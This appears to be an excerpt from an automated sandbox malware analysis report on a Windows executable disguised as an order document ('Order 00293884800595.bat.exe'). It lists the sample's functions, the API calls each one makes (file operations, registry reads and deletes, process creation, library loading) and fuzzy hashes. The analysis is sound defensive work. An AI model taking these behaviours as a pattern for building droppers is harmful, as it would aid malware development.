Call, xrefs: 00401BD3, 00401BD9, 00401BF3

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 0514f784d2a2b378cc714ce1c47b00427531ebb3eb621da23fd343847ac9c6fe
Instruction ID: 9dc913a82bccb3a17233260e0918e107c000b9093c8e114c97909187c283bf28
Opcode Fuzzy Hash: 0514f784d2a2b378cc714ce1c47b00427531ebb3eb621da23fd343847ac9c6fe
Instruction Fuzzy Hash: 292181B2600105EBDB50BFA58E84E5E72E8EB44318711453BF902F32D1DBBCE8169B9D

Function 00402318 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406620: FindFirstFileA.KERNELBASE(763F3410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
Part of subcall function 00406620: FindClose.KERNEL32(00000000), ref: 00406637

lstrlenA.KERNEL32 ref: 00402358
lstrlenA.KERNEL32(00000000), ref: 00402362
SHFileOperationA.SHELL32(?,?,?,00000000), ref: 0040238A

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 291976f7d3112056eb6b717bd47d13cf5f6b9c3e892707c150601705bf3dcc2a
Instruction ID: 014db6f64816cec2a1970dfcbbf9fa03b0cf1b46d42cec59bb2956c4bbb3b767
Opcode Fuzzy Hash: 291976f7d3112056eb6b717bd47d13cf5f6b9c3e892707c150601705bf3dcc2a
Instruction Fuzzy Hash: 35117071E04209ABDB10EFF58A45A9EB7F8AF00314F10407BA501F72C2D6FDC5428B59

Function 004025B5 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,00000011,00000002), ref: 00402612

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
Instruction ID: cba12c4e2b45f70554d055d57f05f50eb42167a32c5ceb359e12f1818167ad50
Opcode Fuzzy Hash: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
Instruction Fuzzy Hash: 4E01BC71604204AFEB218F54DE98ABF7AACEB40348F10443FF005A61C0DAB84A459A29

Function 00402543 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,00000011,00000002), ref: 00402612

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
Opcode Fuzzy Hash: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C

Function 0040244E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
RegCloseKey.ADVAPI32(00000000), ref: 00402478

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 367c10f48611654ec83905158c0e7abb7b05128d9b12c6fa4614681cb29fe441
Instruction ID: 01f6084b7650a9b213f52d22935e9030d34abb49b24569214b94c05b06999087
Opcode Fuzzy Hash: 367c10f48611654ec83905158c0e7abb7b05128d9b12c6fa4614681cb29fe441
Instruction Fuzzy Hash: D3F0B132604121AFDB60EBA49F4DA7F72A99B40314F15003FF101B71C1D9F84D42466E

Function 00401A43 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A56
lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A69

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: EnvironmentExpandStringslstrcmp
String ID:
API String ID: 1938659011-0
Opcode ID: 1f740ebdafb4e989a716510470814d0f4b96e2deadac2d7748d55cb63aed77a8
Instruction ID: 106b93b956adcb394031d7b68410eec4a4f19a4829598155c7958b8f8b1c482a
Opcode Fuzzy Hash: 1f740ebdafb4e989a716510470814d0f4b96e2deadac2d7748d55cb63aed77a8
Instruction Fuzzy Hash: E8F08231B01201EBCB20CF659E48AAF7EE8DF51354B10403BE145F6190D6788643DF5C

Function 00405897 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(00431400,?), ref: 004058D9
GetLastError.KERNEL32 ref: 004058E7

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99

Function 00401EEA Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401F08
EnableWindow.USER32(00000000,00000000), ref: 00401F13

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D

Function 00405926 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,00431400,00000000), ref: 0040594F
CloseHandle.KERNEL32(?), ref: 0040595C

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
Instruction ID: 59d3833cbd0ccaca5dcead9257bf18f7f56651039fadea8639d530792baa2c48
Opcode Fuzzy Hash: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
Instruction Fuzzy Hash: 4DE09AB4A00209BFFB109F65AD09F7B776CE704714F418425B914F2151EB7498148A7C

Function 004066B5 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
GetProcAddress.KERNEL32(00000000,?), ref: 004066E2

Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E

Function 00405E20 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15

Function 004058F1 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004058F7
GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405905

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E

Function 6CA52AC8 Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 6CA52B87

Memory Dump Source

Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true

Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 52879ccc499211326cd2c7456f7cba605a576190bcbe9853d15ff7701ad7a4bd
Instruction ID: 99bfea88b3f47cb72a3d282005b94e82dc6a07063cbb6f7b8e7db8503c47d150
Opcode Fuzzy Hash: 52879ccc499211326cd2c7456f7cba605a576190bcbe9853d15ff7701ad7a4bd
Instruction Fuzzy Hash: A841D676A00309DFDF24DF64E988B8A37B4EB45318FE5CA25E506C6B00C73495EA8BD1

Function 0040269A Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
Instruction ID: c5fbe62f9b4e2cb89eed07bb10574c4b4a04671343a68c93ee4f329e73b59f15
Opcode Fuzzy Hash: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
Instruction Fuzzy Hash: 3521B530D04289EEDF318B6886586EEBBB09F01314F14407FE4D1B72E2C6BC8985CB69

Function 0040168F Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
